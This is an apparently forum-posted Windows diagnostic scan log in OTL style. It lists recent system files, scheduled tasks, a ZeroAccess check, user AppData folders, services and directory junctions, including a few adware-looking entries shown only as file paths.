[2014/07/09 13:59:31 | 002,040,832 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\inetcpl.cpl
[2014/07/09 13:59:31 | 000,608,768 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\ie4uinit.exe
[2014/07/09 13:59:31 | 000,066,048 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\iesetup.dll
[2014/07/09 13:59:30 | 001,068,032 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\mshtmlmedia.dll
[2014/07/09 13:59:30 | 000,112,128 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\ieUnatt.exe
[2014/07/09 13:59:29 | 000,704,512 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\ieapfltr.dll
[2014/07/09 13:59:29 | 000,292,864 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\dxtrans.dll
[2014/07/09 13:59:29 | 000,164,864 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\msrating.dll
[2014/07/09 13:59:29 | 000,062,464 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\MshtmlDac.dll
[2014/07/09 13:59:28 | 000,598,016 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\ieui.dll
[2014/07/09 13:59:28 | 000,085,504 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\mshtmled.dll
[2014/07/09 13:59:27 | 005,721,088 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\jscript9.dll
[2014/07/09 13:59:27 | 001,249,280 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\mshtmlmedia.dll
[2014/07/09 13:59:27 | 000,752,640 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\jscript9diag.dll
[2014/07/09 13:59:27 | 000,548,352 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\vbscript.dll
[2014/07/09 13:59:27 | 000,139,264 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\ieUnatt.exe
[2014/07/09 13:59:26 | 000,846,336 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\ieapfltr.dll
[2014/07/09 13:59:26 | 000,083,968 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\MshtmlDac.dll
[2014/07/09 13:59:25 | 000,940,032 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\MsSpellCheckingFacility.exe
[2014/07/09 13:59:25 | 000,195,584 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\msrating.dll
[2014/07/09 13:58:36 | 001,460,736 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\lsasrv.dll
[2014/07/03 14:00:37 | 000,000,000 | ---D | C] -- C:\ProgramData\ExastraCouupoann
[2014/06/27 13:17:36 | 000,000,000 | ---D | C] -- C:\Users\VPaez\AppData\Local\Adobe
[1 C:\Windows\*.tmp files -> C:\Windows\*.tmp -> ]

========== Files - Modified Within 30 Days ==========

[2014/07/26 19:59:34 | 000,000,432 | -H-- | M] () -- C:\Windows\tasks\SN.Booster-S-482248051.job
[2014/07/26 19:22:44 | 000,024,608 | -H-- | M] () -- C:\Windows\SysNative\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
[2014/07/26 19:22:44 | 000,024,608 | -H-- | M] () -- C:\Windows\SysNative\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
[2014/07/26 19:21:00 | 000,000,830 | ---- | M] () -- C:\Windows\tasks\Adobe Flash Player Updater.job
[2014/07/26 19:20:18 | 019,162,058 | ---- | M] () -- C:\Windows\SysNative\perfh009.dat
[2014/07/26 19:20:17 | 009,404,190 | ---- | M] () -- C:\Windows\SysNative\perfc009.dat
[2014/07/26 19:20:17 | 000,006,210 | ---- | M] () -- C:\Windows\SysNative\PerfStringBackup.INI
[2014/07/26 19:15:27 | 000,067,584 | --S- | M] () -- C:\Windows\bootstat.dat
[2014/07/26 19:15:23 | 3147,714,560 | -HS- | M] () -- C:\hiberfil.sys
[2014/07/13 17:06:13 | 000,002,055 | ---- | M] () -- C:\Users\Public\Desktop\iTunes.lnk
[2014/07/13 00:20:54 | 000,001,207 | ---- | M] () -- C:\Users\VPaez\Application Data\Microsoft\Internet Explorer\Quick Launch\µTorrent.lnk
[2014/07/09 20:32:00 | 000,411,576 | ---- | M] () -- C:\Windows\SysNative\FNTCACHE.DAT
[2014/07/08 16:21:08 | 000,699,056 | ---- | M] (Adobe Systems Incorporated) -- C:\Windows\SysWow64\FlashPlayerApp.exe
[2014/07/08 16:21:08 | 000,071,344 | ---- | M] (Adobe Systems Incorporated) -- C:\Windows\SysWow64\FlashPlayerCPLApp.cpl
[2014/07/03 17:06:04 | 000,000,332 | ---- | M] () -- C:\Windows\tasks\HPCeeScheduleForVPaez.job
[2014/06/29 20:09:33 | 000,519,168 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysNative\aepdu.dll
[2014/06/29 20:04:49 | 000,424,448 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysNative\aeinv.dll
[1 C:\Windows\*.tmp files -> C:\Windows\*.tmp -> ]

========== Files Created - No Company Name ==========

[2014/07/13 17:06:13 | 000,002,055 | ---- | C] () -- C:\Users\Public\Desktop\iTunes.lnk
[2013/06/07 20:49:32 | 000,072,099 | ---- | C] () -- C:\Users\VPaez\Inv_10891_from_All_Star_Landscaping_Services_Ltd._1792.pdf
[2013/02/28 17:01:56 | 000,000,009 | ---- | C] () -- C:\Windows\X6815.INI
[2013/02/06 10:16:48 | 000,015,360 | ---- | C] () -- C:\Windows\Launcher.exe
[2012/08/31 14:11:27 | 000,000,032 | R--- | C] () -- C:\ProgramData\hash.dat
[2012/03/23 15:03:04 | 000,017,408 | ---- | C] () -- C:\Users\VPaez\AppData\Local\WebpageIcons.db
[2011/12/07 19:42:09 | 000,003,584 | ---- | C] () -- C:\Users\VPaez\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
[2011/09/04 23:35:43 | 000,000,056 | -H-- | C] () -- C:\ProgramData\ezsidmv.dat

========== ZeroAccess Check ==========

[2009/07/13 22:55:00 | 000,000,227 | RHS- | M] () -- C:\Windows\assembly\Desktop.ini

[HKEY_CURRENT_USER\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64

[HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]

[HKEY_CURRENT_USER\Software\Classes\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32] /64

[HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32]

[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64
"" = C:\Windows\SysNative\shell32.dll -- [2014/03/24 20:43:12 | 014,175,744 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Apartment

[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]
"" = %SystemRoot%\system32\shell32.dll -- [2014/03/24 20:09:54 | 012,874,240 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Apartment

[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32] /64
"" = C:\Windows\SysNative\wbem\fastprox.dll -- [2009/07/13 19:40:51 | 000,909,312 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Free

[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32]
"" = %systemroot%\system32\wbem\fastprox.dll -- [2010/11/20 21:24:25 | 000,606,208 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Free

[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32] /64
"" = C:\Windows\SysNative\wbem\wbemess.dll -- [2009/07/13 19:41:56 | 000,505,856 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Both

[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32]

========== LOP Check ==========

[2014/07/25 23:02:59 | 000,000,000 | ---D | M] -- C:\Users\Guest\AppData\Roaming\.minecraft
[2014/04/08 11:59:02 | 000,000,000 | ---D | M] -- C:\Users\Guest\AppData\Roaming\Audacity
[2013/06/09 17:31:13 | 000,000,000 | ---D | M] -- C:\Users\Guest\AppData\Roaming\cYo
[2013/07/08 11:43:18 | 000,000,000 | ---D | M] -- C:\Users\Guest\AppData\Roaming\DAEMON Tools Lite
[2011/10/03 09:16:20 | 000,000,000 | ---D | M] -- C:\Users\Guest\AppData\Roaming\DVDVideoSoft
[2012/01/15 17:32:27 | 000,000,000 | ---D | M] -- C:\Users\Guest\AppData\Roaming\EPSON
[2011/10/14 13:54:43 | 000,000,000 | ---D | M] -- C:\Users\Guest\AppData\Roaming\go
[2013/11/08 21:34:41 | 000,000,000 | ---D | M] -- C:\Users\Guest\AppData\Roaming\openvr
[2014/07/26 00:44:17 | 000,000,000 | ---D | M] -- C:\Users\Guest\AppData\Roaming\RenPy
[2013/10/30 17:12:23 | 000,000,000 | ---D | M] -- C:\Users\Guest\AppData\Roaming\SanDisk SecureAccess
[2013/01/21 09:30:45 | 000,000,000 | ---D | M] -- C:\Users\Guest\AppData\Roaming\StepMania 5
[2014/03/10 10:14:34 | 000,000,000 | ---D | M] -- C:\Users\Guest\AppData\Roaming\SumatraPDF
[2013/01/25 17:52:26 | 000,000,000 | ---D | M] -- C:\Users\Guest\AppData\Roaming\UBot Studio
[2014/01/28 19:24:15 | 000,000,000 | ---D | M] -- C:\Users\Guest\AppData\Roaming\Unity
[2014/07/20 02:41:06 | 000,000,000 | ---D | M] -- C:\Users\Guest\AppData\Roaming\uTorrent
[2012/05/26 21:24:01 | 000,000,000 | ---D | M] -- C:\Users\Guest\AppData\Roaming\WildTangent
[2012/10/03 10:32:55 | 000,000,000 | ---D | M] -- C:\Users\Guest\AppData\Roaming\Windows Live Writer
[2013/01/20 18:39:30 | 000,000,000 | ---D | M] -- C:\Users\VPaez\AppData\Roaming\.minecraft
[2014/04/06 19:28:56 | 000,000,000 | ---D | M] -- C:\Users\VPaez\AppData\Roaming\Audacity
[2013/04/06 22:36:20 | 000,000,000 | ---D | M] -- C:\Users\VPaez\AppData\Roaming\cYo
[2013/07/08 11:41:42 | 000,000,000 | ---D | M] -- C:\Users\VPaez\AppData\Roaming\DAEMON Tools Lite
[2013/03/20 10:19:20 | 000,000,000 | ---D | M] -- C:\Users\VPaez\AppData\Roaming\DVDVideoSoft
[2012/08/19 17:44:35 | 000,000,000 | ---D | M] -- C:\Users\VPaez\AppData\Roaming\EPSON
[2012/04/17 16:50:40 | 000,000,000 | ---D | M] -- C:\Users\VPaez\AppData\Roaming\LolClient
[2012/05/23 16:34:03 | 000,000,000 | ---D | M] -- C:\Users\VPaez\AppData\Roaming\LolClient2
[2011/09/24 08:34:57 | 000,000,000 | ---D | M] -- C:\Users\VPaez\AppData\Roaming\OpenCandy
[2014/05/23 20:29:40 | 000,000,000 | ---D | M] -- C:\Users\VPaez\AppData\Roaming\Oracle
[2014/03/21 14:54:20 | 000,000,000 | ---D | M] -- C:\Users\VPaez\AppData\Roaming\SumatraPDF
[2013/03/20 10:02:41 | 000,000,000 | ---D | M] -- C:\Users\VPaez\AppData\Roaming\Systweak
[2014/07/13 00:20:54 | 000,000,000 | ---D | M] -- C:\Users\VPaez\AppData\Roaming\uTorrent
[2012/05/27 13:22:07 | 000,000,000 | ---D | M] -- C:\Users\VPaez\AppData\Roaming\WildTangent
[2012/12/18 22:46:01 | 000,000,000 | ---D | M] -- C:\Users\VPaez\AppData\Roaming\Windows Live Writer

========== Purity Check ==========



========== Custom Scans ==========

< >
[2009/07/13 23:08:49 | 000,000,006 | -H-- | C] () -- C:\Windows\Tasks\SA.DAT
[2009/07/13 23:08:49 | 000,032,568 | ---- | C] () -- C:\Windows\Tasks\SCHEDLGU.TXT
[2012/01/11 18:58:08 | 000,000,332 | ---- | C] () -- C:\Windows\Tasks\HPCeeScheduleForVPaez.job
[2012/04/13 23:19:35 | 000,000,830 | ---- | C] () -- C:\Windows\Tasks\Adobe Flash Player Updater.job
[2014/04/26 12:11:17 | 000,000,432 | -H-- | C] () -- C:\Windows\Tasks\SN.Booster-S-482248051.job

========== Base Services ==========
SRV:64bit: - [2009/07/13 19:40:01 | 000,072,192 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\aelupsvc.dll -- (AeLookupSvc)
SRV:64bit: - [2013/02/26 23:47:10 | 000,070,144 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\appinfo.dll -- (Appinfo)
SRV:64bit: - [2009/07/13 19:38:55 | 000,079,360 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\alg.exe -- (ALG)
SRV:64bit: - [2010/11/20 21:23:51 | 000,849,920 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\qmgr.dll -- (BITS)
SRV:64bit: - [2010/11/20 21:24:00 | 000,705,024 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\BFE.DLL -- (BFE)
SRV:64bit: - [2014/04/11 20:19:05 | 000,031,232 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\lsass.exe -- (KeyIso)
SRV:64bit: - [2009/07/13 19:40:50 | 000,402,944 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\es.dll -- (EventSystem)
SRV - [2009/07/13 19:15:19 | 000,271,360 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysWOW64\es.dll -- (EventSystem)
SRV:64bit: - [2012/07/04 16:13:27 | 000,136,704 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\browser.dll -- (Browser)
SRV:64bit: - [2013/07/08 23:46:20 | 000,184,320 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\cryptsvc.dll -- (CryptSvc)
SRV - [2013/07/08 22:46:31 | 000,140,288 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysWOW64\cryptsvc.dll -- (CryptSvc)
SRV:64bit: - [2010/11/20 21:24:01 | 000,512,000 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\rpcss.dll -- (DcomLaunch)
SRV:64bit: - [2010/11/20 21:24:00 | 000,317,952 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\dhcpcore.dll -- (Dhcp)
SRV - [2010/11/20 21:24:09 | 000,254,464 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysWOW64\dhcpcore.dll -- (Dhcp)
SRV:64bit: - [2011/03/03 00:24:16 | 000,183,296 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\dnsrslvr.dll -- (Dnscache)
SRV:64bit: - [2009/07/13 19:40:35 | 000,111,104 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\eapsvc.dll -- (EapHost)
SRV:64bit: - [2009/07/13 19:41:00 | 000,038,912 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\hidserv.dll -- (hidserv)
SRV - [2009/07/13 19:15:24 | 000,049,152 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysWOW64\hidserv.dll -- (hidserv)
SRV:64bit: - [2009/07/13 19:41:10 | 000,359,424 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\ipnathlp.dll -- (SharedAccess)
SRV:64bit: - [2010/11/20 21:23:48 | 000,501,248 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\IPSECSVC.DLL -- (PolicyAgent)
No service found with a name of MsMpSvc
No service found with a name of NisSrv
SRV:64bit: - [2009/07/13 19:41:54 | 000,524,288 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\swprv.dll -- (swprv)
SRV:64bit: - [2009/07/13 19:41:26 | 000,067,584 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\mmcss.dll -- (MMCSS)
SRV:64bit: - [2009/07/13 19:41:52 | 000,360,448 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\netman.dll -- (Netman)
SRV:64bit: - [2009/07/13 19:41:52 | 000,459,776 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\netprofm.dll -- (netprofm)
SRV - [2009/07/13 19:16:03 | 000,360,448 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysWOW64\netprofm.dll -- (netprofm)
SRV:64bit: - [2012/10/03 11:44:21 | 000,303,104 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\nlasvc.dll -- (NlaSvc)
SRV:64bit: - [2009/07/13 19:41:53 | 000,025,600 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\nsisvc.dll -- (nsi)
SRV:64bit: - [2011/05/24 05:42:55 | 000,404,480 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\umpnpmgr.dll -- (PlugPlay)
SRV:[b]64bit:
- [2012/02/11 00:36:02 | 000,559,104 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\spoolsv.exe -- (Spooler)
SRV:[b]64bit:
- [2014/04/11 20:19:05 | 000,031,232 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\lsass.exe -- (ProtectedStorage)
No service found with a name of EMDMgmt
SRV:[b]64bit:
- [2009/07/13 19:41:53 | 000,099,328 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\rasauto.dll -- (RasAuto)
SRV:[b]64bit:
- [2010/11/20 21:24:17 | 000,344,064 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\rasmans.dll -- (RasMan)
SRV:[b]64bit:
- [2010/11/20 21:24:01 | 000,512,000 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\rpcss.dll -- (RpcSs)
SRV:[b]64bit:
- [2010/11/20 21:24:16 | 000,030,720 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\seclogon.dll -- (seclogon)
SRV:[b]64bit:
- [2014/04/11 20:19:05 | 000,031,232 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\lsass.exe -- (SamSs)
SRV:[b]64bit:
- [2009/07/13 19:41:58 | 000,097,280 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\wscsvc.dll -- (wscsvc)
SRV:[b]64bit:
- [2010/11/20 21:23:48 | 000,236,032 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\srvsvc.dll -- (LanmanServer)
SRV:[b]64bit:
- [2010/11/20 21:23:55 | 000,370,688 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\shsvcs.dll -- (ShellHWDetection)
SRV - [2010/11/20 21:24:03 | 000,328,192 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysWOW64\shsvcs.dll -- (ShellHWDetection)
No service found with a name of slsvc
SRV:[b]64bit:
- [2010/11/20 21:24:16 | 001,110,016 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\schedsvc.dll -- (Schedule)
SRV:[b]64bit:
- [2010/11/20 21:24:32 | 000,316,928 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\tapisrv.dll -- (TapiSrv)
SRV - [2010/11/20 21:24:00 | 000,242,176 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysWOW64\tapisrv.dll -- (TapiSrv)
SRV:[b]64bit:
- [2009/07/13 19:41:55 | 000,044,544 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\themeservice.dll -- (Themes)
SRV:[b]64bit:
- [2012/04/30 23:40:20 | 000,209,920 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\profsvc.dll -- (ProfSvc)
SRV:[b]64bit:
- [2010/11/20 21:23:55 | 001,600,512 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\VSSVC.exe -- (VSS)
SRV:[b]64bit:
- [2010/11/20 21:24:32 | 000,679,424 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\audiosrv.dll -- (AudioSrv)
SRV:[b]64bit:
- [2010/11/20 21:24:32 | 000,679,424 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\audiosrv.dll -- (AudioEndpointBuilder)
SRV:[b]64bit:
- [2010/11/20 21:25:06 | 000,170,496 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\sdrsvc.dll -- (SDRSVC)
SRV:[b]64bit:
- [2013/05/26 23:50:47 | 001,011,712 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Program Files\Windows Defender\MpSvc.dll -- (WinDefend)
SRV:[b]64bit:
- [2010/11/20 21:23:55 | 001,646,080 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\wevtsvc.dll -- (eventlog)
SRV:[b]64bit:
- [2010/11/20 21:24:28 | 000,828,416 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\MPSSVC.dll -- (MpsSvc)
SRV:[b]64bit:
- [2010/11/20 21:24:48 | 000,580,096 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysNative\wiaservc.dll -- (stisvc)
SRV:[b]64bit:
- [2010/11/20 21:24:15 | 000,128,000 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\msiexec.exe -- (msiserver)
SRV - [2010/11/20 21:24:28 | 000,073,216 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysWow64\msiexec.exe -- (msiserver)
SRV:[b]64bit:
- [2009/07/13 19:41:56 | 000,242,688 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\wbem\WMIsvc.dll -- (Winmgmt)
SRV:[b]64bit:
- [2012/06/02 16:19:43 | 002,428,952 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\wuaueng.dll -- (wuauserv)
SRV:[b]64bit:
- [2010/11/20 21:24:09 | 000,252,416 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\dot3svc.dll -- (dot3svc)
SRV:[b]64bit:
- [2009/07/13 19:41:56 | 000,886,784 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\wlansvc.dll -- (Wlansvc)
SRV:[b]64bit:
- [2010/11/20 21:24:32 | 000,118,784 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\wkssvc.dll -- (LanmanWorkstation)

< %SYSTEMDRIVE%\*.exe >

< c:\program files (x86)\Google\Desktop >

< c:\program files\Google\Desktop >

< dir "%systemdrive%\*" /S /A:L /C >
Volume in drive C is OS
Volume Serial Number is 60FF-0DBC
Directory of C:\
13/07/2009 11:08 PM <JUNCTION> Documents and Settings [C:\Users]
0 File(s) 0 bytes
Directory of C:\ProgramData
13/07/2009 11:08 PM <JUNCTION> Application Data [C:\ProgramData]
13/07/2009 11:08 PM <JUNCTION> Desktop [C:\Users\Public\Desktop]
13/07/2009 11:08 PM <JUNCTION> Documents [C:\Users\Public\Documents]
13/07/2009 11:08 PM <JUNCTION> Favorites [C:\Users\Public\Favorites]
13/07/2009 11:08 PM <JUNCTION> Start Menu [C:\ProgramData\Microsoft\Windows\Start Menu]
13/07/2009 11:08 PM <JUNCTION> Templates [C:\ProgramData\Microsoft\Windows\Templates]
0 File(s) 0 bytes
Directory of C:\Users
13/07/2009 11:08 PM <SYMLINKD> All Users [C:\ProgramData]
13/07/2009 11:08 PM <JUNCTION> Default User [C:\Users\Default]
0 File(s) 0 bytes
Directory of C:\Users\All Users
13/07/2009 11:08 PM <JUNCTION> Application Data [C:\ProgramData]
13/07/2009 11:08 PM <JUNCTION> Desktop [C:\Users\Public\Desktop]
13/07/2009 11:08 PM <JUNCTION> Documents [C:\Users\Public\Documents]
13/07/2009 11:08 PM <JUNCTION> Favorites [C:\Users\Public\Favorites]
13/07/2009 11:08 PM <JUNCTION> Start Menu [C:\ProgramData\Microsoft\Windows\Start Menu]
13/07/2009 11:08 PM <JUNCTION> Templates [C:\ProgramData\Microsoft\Windows\Templates]
0 File(s) 0 bytes
Directory of C:\Users\Default
13/07/2009 11:08 PM <JUNCTION> Application Data [C:\Users\Default\AppData\Roaming]
13/07/2009 11:08 PM <JUNCTION> Cookies [C:\Users\Default\AppData\Roaming\Microsoft\Windows\Cookies]
13/07/2009 11:08 PM <JUNCTION> Local Settings [C:\Users\Default\AppData\Local]
13/07/2009 11:08 PM <JUNCTION> My Documents [C:\Users\Default\Documents]
13/07/2009 11:08 PM <JUNCTION> NetHood [C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts]
13/07/2009 11:08 PM <JUNCTION> PrintHood [C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts]
13/07/2009 11:08 PM <JUNCTION> Recent [C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent]
13/07/2009 11:08 PM <JUNCTION> SendTo [C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo]
13/07/2009 11:08 PM <JUNCTION> Start Menu [C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu]
13/07/2009 11:08 PM <JUNCTION> Templates [C:\Users\Default\AppData\Roaming\Microsoft\Windows\Templates]
0 File(s) 0 bytes
Directory of C:\Users\Default\AppData\Local
13/07/2009 11:08 PM <JUNCTION> Application Data [C:\Users\Default\AppData\Local]
13/07/2009 11:08 PM <JUNCTION> History [C:\Users\Default\AppData\Local\Microsoft\Windows\History]
13/07/2009 11:08 PM <JUNCTION> Temporary Internet Files [C:\Users\Default\AppData\Local\Microsoft\Windows\Temporary Internet Files]
0 File(s) 0 bytes
Directory of C:\Users\Default\Documents
13/07/2009 11:08 PM <JUNCTION> My Music [C:\Users\Default\Music]
13/07/2009 11:08 PM <JUNCTION> My Pictures [C:\Users\Default\Pictures]
13/07/2009 11:08 PM <JUNCTION> My Videos [C:\Users\Default\Videos]
0 File(s) 0 bytes
Directory of C:\Users\Guest
31/08/2011 10:45 PM <JUNCTION> Application Data [C:\Users\Guest\AppData\Roaming]
31/08/2011 10:45 PM <JUNCTION> Cookies [C:\Users\Guest\AppData\Roaming\Microsoft\Windows\Cookies]
31/08/2011 10:45 PM <JUNCTION> Local Settings [C:\Users\Guest\AppData\Local]
31/08/2011 10:45 PM <JUNCTION> My Documents [C:\Users\Guest\Documents]
31/08/2011 10:45 PM <JUNCTION> NetHood [C:\Users\Guest\AppData\Roaming\Microsoft\Windows\Network Shortcuts]
31/08/2011 10:45 PM <JUNCTION> PrintHood [C:\Users\Guest\AppData\Roaming\Microsoft\Windows\Printer Shortcuts]
31/08/2011 10:45 PM <JUNCTION> Recent [C:\Users\Guest\AppData\Roaming\Microsoft\Windows\Recent]
31/08/2011 10:45 PM <JUNCTION> SendTo [C:\Users\Guest\AppData\Roaming\Microsoft\Windows\SendTo]
31/08/2011 10:45 PM <JUNCTION> Start Menu [C:\Users\Guest\AppData\Roaming\Microsoft\Windows\Start Menu]
31/08/2011 10:45 PM <JUNCTION> Templates [C:\Users\Guest\AppData\Roaming\Microsoft\Windows\Templates]
0 File(s) 0 bytes
Directory of C:\Users\Guest\AppData\Local
31/08/2011 10:45 PM <JUNCTION> Application Data [C:\Users\Guest\AppData\Local]
31/08/2011 10:45 PM <JUNCTION> History [C:\Users\Guest\AppData\Local\Microsoft\Windows\History]
31/08/2011 10:45 PM <JUNCTION> Temporary Internet Files [C:\Users\Guest\AppData\Local\Microsoft\Windows\Temporary Internet Files]
0 File(s) 0 bytes
Directory of C:\Users\Guest\Documents
31/08/2011 10:45 PM <JUNCTION> My Music [C:\Users\Guest\Music]
31/08/2011 10:45 PM <JUNCTION> My Pictures [C:\Users\Guest\Pictures]
31/08/2011 10:45 PM <JUNCTION> My Videos [C:\Users\Guest\Videos]
0 File(s) 0 bytes
Directory of C:\Users\Public\Documents
13/07/2009 11:08 PM <JUNCTION> My Music [C:\Users\Public\Music]
13/07/2009 11:08 PM <JUNCTION> My Pictures [C:\Users\Public\Pictures]
13/07/2009 11:08 PM <JUNCTION> My Videos [C:\Users\Public\Videos]
0 File(s) 0 bytes
Directory of C:\Users\VPaez
30/08/2011 08:56 PM <JUNCTION> Application Data [C:\Users\VPaez\AppData\Roaming]
30/08/2011 08:56 PM <JUNCTION> Cookies [C:\Users\VPaez\AppData\Roaming\Microsoft\Windows\Cookies]
30/08/2011 08:56 PM <JUNCTION> Local Settings [C:\Users\VPaez\AppData\Local]
30/08/2011 08:56 PM <JUNCTION> My Documents [C:\Users\VPaez\Documents]
